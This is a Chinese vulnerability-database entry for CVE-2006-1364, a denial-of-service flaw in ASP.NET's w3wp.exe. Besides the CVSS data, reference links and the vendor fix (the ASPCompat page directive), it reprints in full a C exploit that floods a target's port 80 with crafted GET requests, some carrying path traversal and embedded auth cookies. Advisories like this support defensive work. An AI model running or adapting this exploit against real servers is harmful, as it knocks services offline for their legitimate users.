CVE-2006-1364
CVSS7.8
发布时间 :2006-03-23 06:06:00
修订时间 :2008-09-05 17:01:43
NMCOES    

[原文]Microsoft w3wp (aka w3wp.exe) does not properly handle when the AspCompat directive is not used when referencing COM components in ASP.NET, which allows remote attackers to cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or are restricted documents located under the ASP.NET application path.


[CNNVD]Microsoft ASP.NET COM Components W3WP远程拒绝服务漏洞(CNNVD-200603-384)

        Microsoft w3wp (aka w3wp.exe)未作妥善处理,这是由于当引用在ASP.NET中的COM组件时,未使用AspCompat指令的缘故,从而远程攻击者通过以下途径制造一个拒绝服务(资源占用或崩溃): 对引用COM组件或位于ASP.NET应用程序路径下受限制的每一个文件重复发送请求。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:asp.net:1.0:sp2
cpe:/a:microsoft:asp.netMicrosoft ASP.NET
cpe:/a:microsoft:asp.net:1.0:sp1
cpe:/a:microsoft:asp.net:1.1Microsoft ASP.NET 1.1
cpe:/a:microsoft:asp.net:1.0Microsoft ASP.NET 1.0
cpe:/a:microsoft:asp.net:1.1:sp1Microsoft ASP.NET 1.1 sp1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1364
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1364
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-384
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17188
(UNKNOWN)  BID  17188
http://www.securiteam.com/windowsntfocus/5KP0O0KI0Y.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5KP0O0KI0Y.html
http://www.milw0rm.com/exploits/1601
(UNKNOWN)  MILW0RM  1601
http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip
(UNKNOWN)  MISC  http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip
http://xforce.iss.net/xforce/xfdb/25392
(UNKNOWN)  XF  ms-aspnet-w3wp-dos(25392)
http://www.securityfocus.com/archive/1/archive/1/428622/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060322 w3wp remote DoS
http://securitytracker.com/id?1015825
(UNKNOWN)  SECTRACK  1015825
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044292.html
(UNKNOWN)  FULLDISC  20060322 w3wp remote DoS
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044291.html
(UNKNOWN)  FULLDISC  20060322 w3wp remote DoS due to improper reference of STA COM components in ASP.NET

- 漏洞信息

Microsoft ASP.NET COM Components W3WP远程拒绝服务漏洞
高危 设计错误
2006-03-23 00:00:00 2006-03-27 00:00:00
远程  
        Microsoft w3wp (aka w3wp.exe)未作妥善处理,这是由于当引用在ASP.NET中的COM组件时,未使用AspCompat指令的缘故,从而远程攻击者通过以下途径制造一个拒绝服务(资源占用或崩溃): 对引用COM组件或位于ASP.NET应用程序路径下受限制的每一个文件重复发送请求。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,厂商发布了相关更新。

- 漏洞信息 (1601)

ASP.NET w3wp (COM Components) Remote Crash Exploit (EDBID:1601)
windows dos
2006-03-22 Verified
0 Debasis Mohanty
N/A [点击下载]
// w3wp-dos.c
//

#include "stdafx.h"

#pragma comment (lib,"ws2_32")

#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>

char * pszUnauthLinks(DWORD);

#define portno	80

int main(int argc, CHAR* argv[])
{
	char	szWorkBuff[100];
	DWORD	dwCount = 0, dwCounter;
	int	iCnt = 0, iCount = 0;

	SOCKET	conn_socket; 
	WSADATA wsaData;
	struct	sockaddr_in sin;
	struct	hostent *phostent;
	char	*pszTargetHost = new char[MAX_PATH]; 
	UINT	uAddr; 

	if (argc<2)
	{
		printf("============================================\n");
		printf("\t\t w3wp-dos by Debasis Mohanty\n");
		printf("\t\t www.hackingspirits.com\n");
		printf("============================================\n");

		printf("\nUsage: w3wpdos <HostIP / HostName> \n\n");

		exit(0);
	}

	int iRetval; 
	if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {
		printf( "WSAStartup failed with error %d\n",iRetval);
		WSACleanup(); exit(1); }

	// Make a check on the length of the parameter provided
	if (strlen(argv[1]) > MAX_PATH)	{ 
		printf( "Too long parameter ....\n"); exit(1); }
	else
		strcpy(pszTargetHost, argv[1]);

	// Resolve the hostname into IP address or vice-versa
	if(isalpha(pszTargetHost[0])) 
		phostent = gethostbyname(pszTargetHost);
	else  { 
		uAddr = inet_addr(pszTargetHost);
		phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);

		if(phostent != NULL)
			wsprintf( pszTargetHost, "[+] %s", phostent->h_name);
		else	{
			printf( "Failed to resolve IP address, please provide host name.\n" );
			WSACleanup();
			exit(1);	
		}
	}

	if (phostent == NULL )	{
		printf("Cannot resolve address [%s]: Error %d\n", pszTargetHost, 
			WSAGetLastError());

		WSACleanup();
		printf( "Target host seems to be down or the program failed to resolve host name.");
		printf( "Press enter to exit" );

		getchar();
		exit(1); }

	// Initialise Socket info
	memset(&sin,0,sizeof(sin));
	memcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);
	sin.sin_family = phostent->h_addrtype;
	sin.sin_port = htons(portno);

	conn_socket = socket(AF_INET, SOCK_STREAM, 0); 
	if (conn_socket < 0 )	{
		printf("Error Opening socket: Error %d\n", WSAGetLastError());
		WSACleanup();

		return -1;}

	printf("============================================\n");
	printf("\t\t w3wp-dos by Debasis Mohanty\n");
	printf("\t\t www.hackingspirits.com\n");
	printf("============================================\n");

	printf("[+] Host name: %s\n", pszTargetHost);
	wsprintf( szWorkBuff, "%u.%u.%u.%u", 
		sin.sin_addr.S_un.S_un_b.s_b1,
		sin.sin_addr.S_un.S_un_b.s_b2,
		sin.sin_addr.S_un.S_un_b.s_b3,
		sin.sin_addr.S_un.S_un_b.s_b4 );
	printf("[+] Host IP: %s\n", szWorkBuff);

	closesocket(conn_socket);

	printf("[+] Ready to generate requests\n");

	/* The count should be modified depending upon the 
	number of links in the szBuff array	*/
	while(dwCount++ < 10) 
	{						

		conn_socket = socket(AF_INET, SOCK_STREAM, 0);
		memcpy(phostent->h_addr, (char *)&sin.sin_addr, phostent->h_length);
		sin.sin_family = AF_INET;
		sin.sin_port = htons(portno);

		if(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)
			perror("connect");

		printf( "[%i] %s", dwCount, pszUnauthLinks(dwCount));
		for(dwCounter=1;dwCounter < 9;dwCounter++) 
		{
			send(conn_socket,pszUnauthLinks(dwCount), strlen(pszUnauthLinks(dwCount)),0);

			char *szBuffer = new char[256];
			recv(conn_socket, szBuffer, 256, 0);
			printf(".");
			// 			if( szBuffer != NULL) 
			//				printf("%s", szBuffer);
			delete szBuffer;
			Sleep(100);
		}
		printf("\n");
		closesocket(conn_socket);
	}

	return 1;
}


char * pszUnauthLinks( DWORD dwIndex )
{
	char	*szBuff[10];
	TCHAR	*szGetReqH = new char[1024]; 

	/*	Modify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app path. 	*/

	szBuff[1] = "GET /aspnet-app\\web.config";
	szBuff[2] = "GET /aspnet-app\\../aspnetlogs\\log1.logs";
	szBuff[3] = "GET /aspnet-app\\default-userscreen.aspx";
	szBuff[4] = "GET /aspnet-app\\users/config.aspx";
	szBuff[5] = "GET /aspnet-app\\links/anycomref.aspx";	//
	szBuff[6] = "GET /aspnet-app\\com-ref-link1.aspx";		// Links of pages referring 
	szBuff[7] = "GET /aspnet-app\\com-ref-link2.aspx";		// COM components.
	szBuff[8] = "GET /aspnet-app\\com-ref-link3.aspx";		//
	szBuff[9] = "GET /aspnet-app\\com-ref-link4.aspx";		//

	/* Prepare the GET request for the desired link */
	strcpy(szGetReqH, szBuff[dwIndex]);
	strcat(szGetReqH, " HTTP/1.1\r\n");
	strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
	strcat(szGetReqH, "Accept-Language: en-us\r\n");
	strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");
	strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");
	strcat(szGetReqH, "Host: \r\n" );
	strcat(szGetReqH, "Connection: Keep-Alive\r\n" );

	/* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */
	strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\r\n" );
	strcat(szGetReqH, ".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );

	// return szBuff[dwIndex];
	return szGetReqH;
}

// milw0rm.com [2006-03-22]
		

- 漏洞信息

30402
Microsoft w3wp Crafted COM Component Request DoS
Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

2006-03-22 Unknow
2006-03-21 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft ASP.NET COM Components W3WP Remote Denial Of Service Vulnerability
Design Error 17188
Yes No
2006-03-22 12:00:00 2007-06-27 10:18:00
Debasis Mohanty is credited with the discovery of this vulnerability.

- 受影响的程序版本

Microsoft ASP.NET 1.1 SP1
Microsoft ASP.NET 1.1
Microsoft ASP.NET 1.0 SP2
Microsoft ASP.NET 1.0 SP1
Microsoft ASP.NET 1.0
Microsoft ASP.NET 0

- 漏洞讨论

Improper access of COM and COM+ components in ASP.NET applications can cause a denial-of-service condition in 'w3wp.exe' processes.

A remote attacker can exploit this issue to cause denial-of-service conditions in applications using improperly coded ASP.NET, effectively denying service to legitimate users.

- 漏洞利用

The following proof-of-concept exploit is available:

- 解决方案

According to the vendor, supplying the following @Page directive in ASP.NET applications will alleviate this problem:

<%@Page ASPCompat="true" %>

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站